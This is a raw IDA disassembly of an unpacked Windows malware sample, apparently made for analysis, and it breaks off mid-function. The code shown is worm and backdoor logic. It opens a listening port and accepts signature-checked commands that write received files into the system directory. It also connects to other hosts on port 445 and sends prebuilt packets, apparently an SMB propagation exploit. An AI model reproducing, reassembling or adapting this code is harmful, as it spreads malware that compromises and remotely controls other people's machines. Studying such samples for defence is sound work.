;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 26B990A608CB5FC49469B6FCC6ECF0F3
; File Name : u:\work\26b990a608cb5fc49469b6fcc6ecf0f3_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31300000
; Section 1. (virtual address 00001000)
; Virtual size : 00004000 ( 16384.)
; Section size in file : 00004000 ( 16384.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31301000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31301000 dd 77DD590Bh ; DATA XREF: sub_313033C3+1A�r
dword_31301004 dd 77DD59F0h ; DATA XREF: sub_313033C3+38�r
dword_31301008 dd 77DD23D7h ; DATA XREF: sub_3130336A+3E�r
dword_3130100C dd 77DD22EAh ; DATA XREF: sub_31303335+14�r
; sub_3130336A+1D�r
dword_31301010 dd 77DD5C55h ; DATA XREF: sub_31303335+24�r
dword_31301014 dd 77DD189Ah ; DATA XREF: sub_31303335+2D�r
; sub_3130336A+4E�r ...
dword_31301018 dd 77E2A571h ; DATA XREF: sub_31302E37+BB�r
dword_3130101C dd 77DE089Eh ; DATA XREF: sub_31301228+90�r
dword_31301020 dd 77DE07A3h ; DATA XREF: sub_31301228+A2�r
dword_31301024 dd 77DE0D79h ; DATA XREF: sub_31301228+C8�r
dword_31301028 dd 77DE0343h ; DATA XREF: sub_31301228+DB�r
; sub_31301228+FD�r
dword_3130102C dd 77DE0AF0h ; DATA XREF: sub_3130120D+6�r
dword_31301030 dd 77DE042Eh ; DATA XREF: sub_3130120D+11�r
dword_31301034 dd 77DDEBA2h ; DATA XREF: sub_313011B9+2�r
dword_31301038 dd 77DE0BB2h ; DATA XREF: sub_313011B9+41�r
align 10h
dword_31301040 dd 77E79E34h ; DATA XREF: sub_3130372B+B�r
dword_31301044 dd 77E7980Ah ; DATA XREF: sub_31303717+D�r
dword_31301048 dd 77E7A099h ; DATA XREF: sub_31303641+15�r
dword_3130104C dd 77E76A2Eh ; DATA XREF: sub_31303641+7F�r
dword_31301050 dd 77E6BD13h ; DATA XREF: sub_31303575+71�r
dword_31301054 dd 77E684C6h ; DATA XREF: sub_31303575+B0�r
dword_31301058 dd 77EBB1E7h ; DATA XREF: sub_313037AE�r
dword_3130105C dd 77EBA595h ; DATA XREF: sub_313037A8�r
dword_31301060 dd 77E616B4h ; DATA XREF: sub_31303416+9B�r
dword_31301064 dd 77EBA6E9h ; DATA XREF: sub_313037A2�r
dword_31301068 dd 77E75CEBh ; DATA XREF: sub_31302E37+D5�r
dword_3130106C dd 77E73628h ; DATA XREF: UPX0:31302DCB�r
; sub_31303575+F�r
dword_31301070 dd 77E75CB5h ; DATA XREF: UPX0:31302DF5�r
; sub_31303575+C3�r
dword_31301074 dd 77E793EFh ; DATA XREF: sub_31302C49+6E�r
dword_31301078 dd 77E78B82h ; DATA XREF: sub_31302C49+92�r
dword_3130107C dd 77E777EFh ; DATA XREF: sub_31302BFB+2A�r
; sub_31303112+3E�r ...
dword_31301080 dd 77E61BB8h ; DATA XREF: sub_31302B15+38�r
dword_31301084 dd 77E7C2C4h ; DATA XREF: sub_31302A9B+8�r
dword_31301088 dd 77E76432h, 77E7513Ch ; DATA XREF: sub_31302755+14E�r
; sub_31302755:loc_3130299E�r ...
dword_31301090 dd 77E73167h ; DATA XREF: sub_313011A0+F�r
; UPX0:313025A3�r ...
dword_31301094 dd 77F5157Dh ; DATA XREF: sub_31301228:loc_313012FA�r
; sub_31301228:loc_31301309�r ...
dword_31301098 dd 77E77C4Ch ; DATA XREF: sub_31301228+1E�r
dword_3130109C dd 77E61608h ; DATA XREF: sub_31301228+10�r
; sub_313023D4+A�r
dword_313010A0 dd 77E77963h ; DATA XREF: sub_31301341+116�r
; sub_31301562+66�r ...
dword_313010A4 dd 77E79D8Ch ; DATA XREF: sub_31301341+F2�r
; sub_3130263B+ED�r
dword_313010A8 dd 77E7A837h ; DATA XREF: sub_31301341+83�r
; sub_3130263B+8F�r ...
dword_313010AC dd 77E73BEFh ; DATA XREF: sub_31301341+69�r
; sub_31301631+4F�r ...
dword_313010B0 dd 77E705C5h ; DATA XREF: sub_31301341+4C�r
; sub_31301341+14B�r
dword_313010B4 dd 77E704FCh ; DATA XREF: sub_31301341+3F�r
; sub_31301341+13E�r ...
dword_313010B8 dd 77E73C49h ; DATA XREF: sub_313014C6+8E�r
; sub_31302BFB+42�r ...
dword_313010BC dd 77E74A3Bh ; DATA XREF: sub_313014C6+1B�r
dword_313010C0 dd 77E79D5Bh ; DATA XREF: sub_31301562+C2�r
; sub_31302E23+8�r
dword_313010C4 dd 77E7AC37h ; DATA XREF: sub_31301562+B1�r
; sub_31302AAA+12�r ...
dword_313010C8 dd 77E737DEh ; DATA XREF: sub_31301562+98�r
; sub_31302E37+14�r
dword_313010CC dd 77E74672h ; DATA XREF: sub_31301631+253�r
; sub_31301631+272�r ...
dword_313010D0 dd 77E61BE6h ; DATA XREF: sub_31301631+16C�r
; sub_31301E60+A4�r ...
dword_313010D4 dd 77E79C90h ; DATA XREF: sub_31301B98+4D�r
dword_313010D8 dd 77E7A5FDh ; DATA XREF: sub_31301B98+13�r
; sub_31301C20+2C�r
dword_313010DC dd 77E79F93h ; DATA XREF: sub_31301B98+D�r
; sub_31301C20+26�r ...
dword_313010E0 dd 77E61A90h ; DATA XREF: sub_31301C20+BC�r
dword_313010E4 dd 77E706B7h ; DATA XREF: sub_31301C20+8A�r
; sub_31303416+92�r
dword_313010E8 dd 77E7751Ah ; DATA XREF: sub_31302260+13�r
; sub_31302755+1E�r ...
dword_313010EC dd 77E74155h ; DATA XREF: UPX0:31302472�r
; sub_3130263B+3D�r ...
dd 0
dword_313010F4 dd 77C41FA0h ; DATA XREF: sub_3130379C�r
dword_313010F8 dd 77C41FB0h ; DATA XREF: sub_31303796�r
dword_313010FC dd 77C1BE00h ; DATA XREF: sub_31302755+1F6�r
dword_31301100 dd 77C35280h ; DATA XREF: sub_313023D4+24�r
; sub_31302A6D+22�r
; ---------------------------------------------------------------------------
loc_31301104: ; DATA XREF: sub_31303790�r
xor [edx], bl
retn 0D877h ; DATA XREF: sub_313037B4:loc_31303780�r
; ---------------------------------------------------------------------------
db 1Ah, 0C2h, 77h
dword_3130110C dd 77C43AB0h ; DATA XREF: sub_31301E60+13B�r
; sub_313020A2+16�r ...
dword_31301110 dd 77C43500h ; DATA XREF: sub_31301D2B+37�r
; sub_31302755+BA�r
dword_31301114 dd 77C43710h ; DATA XREF: sub_3130374A�r
dword_31301118 dd 77C43490h ; DATA XREF: sub_31303744�r
dword_3130111C dd 77C42E10h ; DATA XREF: sub_3130373E�r
dword_31301120 dd 77C3528Dh ; DATA XREF: sub_31301228+103�r
; sub_313021F7+C�r ...
align 8
dword_31301128 dd 77D4BDCAh ; DATA XREF: sub_31301C20+5D�r
dword_3130112C dd 77D4456Bh ; DATA XREF: sub_31301C20+67�r
dword_31301130 dd 77D45CBCh ; DATA XREF: sub_31301C20+7A�r
dword_31301134 dd 77D4C96Ah ; DATA XREF: sub_31301631+62�r
; sub_31301E60+8D�r ...
dd 0
dword_3130113C dd 762211EFh ; DATA XREF: sub_31302BE5+8�r
; sub_31303256+2B�r
dword_31301140 dd 7620AFB6h ; DATA XREF: sub_3130263B+18�r
dword_31301144 dd 7620BD61h ; DATA XREF: sub_3130263B+DB�r
dword_31301148 dd 76214750h ; DATA XREF: sub_3130263B+A9�r
align 10h
dword_31301150 dd 71AB41DAh ; DATA XREF: sub_31302D8D+10�r
dword_31301154 dd 71AB12A7h ; DATA XREF: sub_31302F59+5B�r
dword_31301158 dd 71AB32CAh ; DATA XREF: sub_31302BA6+C�r
dword_3130115C dd 71AB1740h ; DATA XREF: sub_31302BA6+17�r
dword_31301160 dd 71AB12F8h ; DATA XREF: sub_31302B6B+7�r
dword_31301164 dd 71AB2BBFh ; DATA XREF: sub_31302B6B+1E�r
; sub_31302BA6+25�r
dword_31301168 dd 71AB1890h ; DATA XREF: sub_31302260+50�r
dword_3130116C dd 71AB401Ch ; DATA XREF: sub_31301631+44�r
dword_31301170 dd 71AB3E5Dh ; DATA XREF: sub_31301631+15D�r
; sub_31301E60+46�r
dword_31301174 dd 71AB8629h ; DATA XREF: sub_31301631+550�r
; sub_31302BFB+33�r
dword_31301178 dd 71AB3C22h ; DATA XREF: sub_31301562+10�r
; sub_31301631+2B�r ...
dword_3130117C dd 71AB1746h ; DATA XREF: sub_31301562+38�r
; sub_31301631+147�r ...
dword_31301180 dd 71AB3ECEh ; DATA XREF: sub_31301562+4B�r
; sub_31302C49+100�r ...
dword_31301184 dd 71AB5DE2h ; DATA XREF: sub_31301562+60�r
; sub_31302C49+10D�r ...
dword_31301188 dd 71AB868Dh ; DATA XREF: sub_31301562+7E�r
; sub_31302C49+120�r ...
dword_3130118C dd 71AB1A6Dh ; DATA XREF: sub_313014C6+86�r
; sub_31301631+559�r ...
dword_31301190 dd 71AB5690h ; DATA XREF: sub_31301228+3B�r
; sub_31301341+D9�r ...
dword_31301194 dd 71AB1AF4h ; DATA XREF: sub_31301228+111�r
; sub_31301341+95�r ...
align 10h
; =============== S U B R O U T I N E =======================================
sub_313011A0 proc near ; CODE XREF: sub_313014C6+32�p
push esi
mov esi, ecx
push offset aCont ; "cont"
and dword ptr [esi], 0
lea eax, [esi+4]
push eax
call dword_31301090 ; lstrcpy
mov eax, esi
pop esi
retn
sub_313011A0 endp
; =============== S U B R O U T I N E =======================================
sub_313011B9 proc near ; CODE XREF: sub_313014C6+3A�p
push ebx
push ebp
mov ebx, dword_31301034
push esi
push edi
xor ebp, ebp
mov edi, ecx
push ebp
push 1
push ebp
lea esi, [edi+10h]
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_313011E8
push 8
push 1
push ebp
push ebp
push esi
call ebx ; CryptAcquireContextA
test eax, eax
jnz short loc_313011E8
push 1
pop eax
jmp short loc_31301208
; ---------------------------------------------------------------------------
loc_313011E8: ; CODE XREF: sub_313011B9+1B�j
; sub_313011B9+28�j
add edi, 14h
push edi
push ebp
push ebp
push 114h
push offset dword_31304000
push dword ptr [esi]
call dword_31301038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_31301208: ; CODE XREF: sub_313011B9+2D�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_313011B9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3130120D proc near ; CODE XREF: sub_313014C6+7E�p
push esi
mov esi, ecx
push dword ptr [esi+14h]
call dword_3130102C ; CryptDestroyKey
push 0
push dword ptr [esi+10h]
call dword_31301030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3130120D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301228 proc near ; CODE XREF: sub_313014C6+46�p
var_28 = byte ptr -28h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
mov [ebp+var_8], ecx
push eax
call dword_3130109C ; GetSystemTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_28]
push eax
call dword_31301098 ; SystemTimeToFileTime
mov esi, 4000h
push esi
call sub_31303717
mov ebx, [ebp+arg_0]
pop ecx
mov edi, eax
push 0
push esi
push edi
push dword ptr [ebx]
call dword_31301190 ; recv
lea esi, [edi+8]
push 8
lea eax, [ebp+var_10]
push esi
push eax
call sub_3130373E ; memcpy
mov ecx, [ebp+var_10]
mov eax, [ebp+var_C]
add esp, 0Ch
sub ecx, [ebp+var_18]
sbb eax, [ebp+var_14]
cmp eax, 8
jg short loc_31301309
jl short loc_31301296
cmp ecx, 61C46800h
ja short loc_31301309
loc_31301296: ; CODE XREF: sub_31301228+64�j
cmp eax, 0FFFFFFF7h
jl short loc_31301309
jg short loc_313012A5
cmp ecx, 9E3B9800h
jb short loc_31301309
loc_313012A5: ; CODE XREF: sub_31301228+73�j
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push 0
push 0
push 8003h
push dword ptr [eax+10h]
call dword_3130101C ; CryptCreateHash
test eax, eax
jz short loc_313012FA
push 0
push 8
push esi
push [ebp+var_4]
call dword_31301020 ; CryptHashData
test eax, eax
jz short loc_313012FA
mov eax, [edi+10h]
cmp eax, 2800h
ja short loc_313012FA
mov ecx, [ebp+var_8]
xor esi, esi
push esi
push esi
push dword ptr [ecx+14h]
push eax
lea eax, [edi+14h]
push eax
push [ebp+var_4]
call dword_31301024 ; CryptVerifySignatureA
test eax, eax
jnz short loc_31301322
loc_313012FA: ; CODE XREF: sub_31301228+98�j
; sub_31301228+AA�j ...
call dword_31301094 ; RtlGetLastWin32Error
push [ebp+var_4]
call dword_31301028 ; CryptDestroyHash
loc_31301309: ; CODE XREF: sub_31301228+62�j
; sub_31301228+6C�j ...
call dword_31301094 ; RtlGetLastWin32Error
push 2
pop esi
loc_31301312: ; CODE XREF: sub_31301228+117�j
push edi
call sub_3130372B
pop ecx
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31301322: ; CODE XREF: sub_31301228+D0�j
push [ebp+var_4]
call dword_31301028 ; CryptDestroyHash
call dword_31301120 ; rand
push esi
push 4
push edi
mov [edi], eax
push dword ptr [ebx]
call dword_31301194 ; send
jmp short loc_31301312
sub_31301228 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301341 proc near ; CODE XREF: sub_313014C6+6A�p
var_220 = byte ptr -220h
var_118 = byte ptr -118h
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 220h
cmp [ebp+arg_8], 8
push ebx
push esi
push edi
jge short loc_31301360
push 0
push [ebp+arg_8]
push [ebp+arg_4]
jmp loc_313014B8
; ---------------------------------------------------------------------------
loc_31301360: ; CODE XREF: sub_31301341+10�j
mov esi, [ebp+arg_4]
mov ebx, 104h
mov eax, [esi]
lea edi, [esi+8]
test eax, eax
mov [ebp+arg_4], eax
jnz loc_31301471
lea eax, [ebp+var_220]
push ebx
push eax
call dword_313010B4 ; GetSystemDirectoryA
lea eax, [ebp+var_220]
push eax
call dword_313010B0 ; SetCurrentDirectoryA
mov eax, [edi]
push ebx
mov [ebp+arg_8], eax
mov eax, [edi+4]
mov [ebp+var_4], eax
lea eax, [edi+8]
push eax
lea eax, [ebp+var_118]
push eax
call dword_313010AC ; lstrcpyn
xor eax, eax
push eax
push eax
push 2
push eax
push eax
lea eax, [ebp+var_118]
push 40000000h
push eax
call dword_313010A8 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_3130145F
mov ebx, dword_31301194
push 0
push 8
push esi
push [ebp+arg_0]
mov dword ptr [esi+4], 1
call ebx ; send
mov eax, [ebp+arg_8]
xor edx, edx
div [ebp+var_4]
xor edx, edx
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
div [ebp+var_4]
test edx, edx
jz short loc_31301407
inc [ebp+arg_4]
loc_31301407: ; CODE XREF: sub_31301341+C1�j
and [ebp+var_8], 0
cmp [ebp+arg_4], 0
jle short loc_31301454
loc_31301411: ; CODE XREF: sub_31301341+111�j
push 0
push [ebp+var_4]
push edi
push [ebp+arg_0]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
mov [ebp+arg_8], eax
jz short loc_31301454
lea ecx, [ebp+var_10]
push 0
push ecx
push eax
push edi
push [ebp+var_C]
call dword_313010A4 ; WriteFile
mov eax, [ebp+arg_8]
push 0
push 8
push esi
push [ebp+arg_0]
mov [esi+4], eax
call ebx ; send
inc [ebp+var_8]
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_4]
jl short loc_31301411
loc_31301454: ; CODE XREF: sub_31301341+CE�j
; sub_31301341+E5�j
push [ebp+var_C]
call dword_313010A0 ; CloseHandle
jmp short loc_313014C1
; ---------------------------------------------------------------------------
loc_3130145F: ; CODE XREF: sub_31301341+8F�j
and dword ptr [esi+4], 0
push 0
push 8
push esi
push [ebp+arg_0]
call dword_31301194 ; send
loc_31301471: ; CODE XREF: sub_31301341+31�j
cmp [ebp+arg_4], 1
jnz short loc_313014A0
lea eax, [ebp+var_118]
push ebx
push eax
call dword_313010B4 ; GetSystemDirectoryA
lea eax, [ebp+var_118]
push eax
call dword_313010B0 ; SetCurrentDirectoryA
push 0
push 4
push esi
push [ebp+arg_0]
call dword_31301194 ; send
loc_313014A0: ; CODE XREF: sub_31301341+134�j
cmp [ebp+arg_4], 3
jnz short loc_313014C1
push dword ptr [edi]
add edi, 4
push edi
call sub_31302B15
pop ecx
pop ecx
push 0
push 4
push esi
loc_313014B8: ; CODE XREF: sub_31301341+1A�j
push [ebp+arg_0]
call dword_31301194 ; send
loc_313014C1: ; CODE XREF: sub_31301341+11C�j
; sub_31301341+163�j
pop edi
pop esi
pop ebx
leave
retn
sub_31301341 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_313014C6 proc near ; DATA XREF: sub_31301562+AA�o
var_30 = byte ptr -30h
var_18 = dword ptr -18h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
call sub_31302A6D
mov esi, [ebp+arg_0]
push 6
pop ecx
lea edi, [ebp+var_18]
rep movsd
push [ebp+var_4]
call dword_313010BC ; SetEvent
mov esi, 10000h
push esi
call sub_31303717
pop ecx
mov edi, eax
lea ecx, [ebp+var_30]
call sub_313011A0
lea ecx, [ebp+var_30]
call sub_313011B9
lea eax, [ebp+var_18]
lea ecx, [ebp+var_30]
push eax
call sub_31301228
test eax, eax
jnz short loc_3130153A
loc_31301515: ; CODE XREF: sub_313014C6+72�j
push 0
push esi
push edi
push [ebp+var_18]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz short loc_3130153A
test eax, eax
jz short loc_3130153A
push eax
push edi
push [ebp+var_18]
call sub_31301341
add esp, 0Ch
jmp short loc_31301515
; ---------------------------------------------------------------------------
loc_3130153A: ; CODE XREF: sub_313014C6+4D�j
; sub_313014C6+5F�j ...
push edi
call sub_3130372B
pop ecx
lea ecx, [ebp+var_30]
call sub_3130120D
push [ebp+var_18]
call dword_3130118C ; closesocket
push 0
call dword_313010B8 ; ExitThread
pop edi
xor eax, eax
pop esi
leave
retn 4
sub_313014C6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_31301562 proc near ; DATA XREF: sub_31302E37+90�o
var_44 = dword ptr -44h
var_40 = byte ptr -40h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 44h
push ebx
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call dword_31301178 ; socket
mov [ebp+var_4], eax
push 10h
lea eax, [ebp+var_1C]
push esi
push eax
call sub_31303744 ; memset
add esp, 0Ch
mov [ebp+var_1C], 2
mov [ebp+var_18], esi
loc_31301593: ; CODE XREF: sub_31301562+59�j
lea eax, [esi+0BFBh]
push eax
call dword_3130117C ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1C]
push 10h
push eax
push [ebp+var_4]
call dword_31301180 ; bind
test eax, eax
jz short loc_313015BD
inc esi
cmp esi, 0Ah
jl short loc_31301593
loc_313015BD: ; CODE XREF: sub_31301562+53�j
push 32h
push [ebp+var_4]
call dword_31301184 ; listen
mov ebx, dword_313010A0
loc_313015CE: ; CODE XREF: sub_31301562+CD�j
lea eax, [ebp+var_8]
mov [ebp+var_8], 10h
push eax
lea eax, [ebp+var_2C]
push eax
push [ebp+var_4]
call dword_31301188 ; accept
lea esi, [ebp+var_2C]
lea edi, [ebp+var_40]
mov [ebp+var_44], eax
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push 1
push esi
call dword_313010C8 ; CreateEventA
mov [ebp+var_30], eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_44]
push esi
push eax
push offset sub_313014C6
push esi
push esi
call dword_313010C4 ; CreateThread
push eax
call ebx ; CloseHandle
push 3E8h
push [ebp+var_30]
call dword_313010C0 ; WaitForSingleObject
push [ebp+var_30]
call ebx ; CloseHandle
jmp short loc_313015CE
sub_31301562 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31301631 proc near ; CODE XREF: sub_313030B2+35�p
; sub_31303112+47�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31303750
mov eax, dword_31304B0C
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31304B10
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31301178 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31301B91
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3130116C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_313010AC ; lstrcpyn
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31304B00
push eax
call dword_31301134 ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_313016A4: ; CODE XREF: sub_31301631+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_313016A4
push 60h
lea eax, [ebp+var_E4]
push offset dword_31304614
push eax
call sub_3130373E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_3130374A ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_3130373E ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_3130374A ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_3130373E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_3130374A ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_3130373E ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_3130374A ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_3130373E ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31303744 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31303744 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_3130117C ; htons
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31301170 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31301B87
mov esi, dword_313010D0
mov edi, 0C8h
push edi
call esi ; Sleep
push ebx
mov ebx, dword_31301194
push 89h
push offset dword_313043FC
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
push 0
push 0A8h
push offset dword_31304488
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
push 0
push 0DEh
push offset dword_31304534
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
cmp eax, 46h
jl loc_31301B7C
cmp [ebp+var_730], 31h
jnz loc_31301A27
and [ebp+arg_0], 0
push 7D0h
lea eax, [ebp+var_F44]
push 90h
push eax
call sub_31303744 ; memset
add esp, 0Ch
push offset loc_31304120
call dword_313010CC ; lstrlen
push eax
lea eax, [ebp+var_EA4]
push offset loc_31304120
push eax
call sub_3130373E ; memcpy
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
call dword_313010CC ; lstrlen
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_788]
push eax
call sub_3130373E ; memcpy
mov eax, dword_31304A40
add esp, 0Ch
mov [ebp+var_798], eax
loc_313018C8: ; CODE XREF: sub_31301631+4E1�j
movsx eax, [ebp+var_5]
add eax, 4
push 0
push eax
lea eax, [ebp+var_E4]
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
push 0
push 68h
push offset dword_31304678
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
push 0
push 0A0h
push offset dword_313046E4
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
cmp [ebp+arg_0], 0
jz loc_31301B17
push 68h
lea eax, [ebp+var_89E4]
push offset dword_3130489C
push eax
call sub_3130373E ; memcpy
lea eax, [ebp+var_4834]
push 1B5Ah
push eax
lea eax, [ebp+var_897C]
push eax
call sub_3130373E ; memcpy
push 70h
lea eax, [ebp+var_690C]
push offset dword_31304908
push eax
call sub_3130373E ; memcpy
lea eax, [ebp+var_37A0]
push 0A5Eh
push eax
lea eax, [ebp+var_689C]
push eax
call sub_3130373E ; memcpy
push 84h
lea eax, [ebp+var_5DD8]
push offset dword_3130497C
push eax
call sub_3130373E ; memcpy
add esp, 3Ch
lea eax, [ebp+var_89E4]
push 0
push 10FCh
push eax
push [ebp+var_4]
call ebx ; send
push edi
call esi ; Sleep
push 0
lea eax, [ebp+var_774]
push 640h
push eax
push [ebp+var_4]
call dword_31301190 ; recv
cmp eax, 0FFFFFFFFh
jz loc_31301B7C
push 0
push 0FDCh
lea eax, [ebp+var_690C]
jmp loc_31301B6F
; ---------------------------------------------------------------------------
loc_31301A27: ; CODE XREF: sub_31301631+22B�j
push 0DACh
lea eax, [ebp+var_2CD8]
push 90h
push eax
mov [ebp+arg_0], 1
call sub_31303744 ; memset
push 4
lea eax, [ebp+var_24F4]
push offset dword_31304A7C
push eax
call sub_3130373E ; memcpy
push offset loc_31304120
call sub_3130374A ; strlen
push eax
lea eax, [ebp+var_24E4]
push offset loc_31304120
push eax
call sub_3130373E ; memcpy
push 4
lea eax, [ebp+var_21C0]
push offset loc_31304AF8
push eax
call sub_3130373E ; memcpy
push 4
lea eax, [ebp+var_21BC]
push offset dword_31304A7C
push eax
call sub_3130373E ; memcpy
add esp, 40h
push offset loc_31304120
call sub_3130374A ; strlen
push eax
